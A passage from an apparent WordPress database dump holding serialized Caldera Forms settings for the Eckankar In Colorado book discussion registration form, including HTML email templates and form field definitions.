url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(37,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:51:19 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8021:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 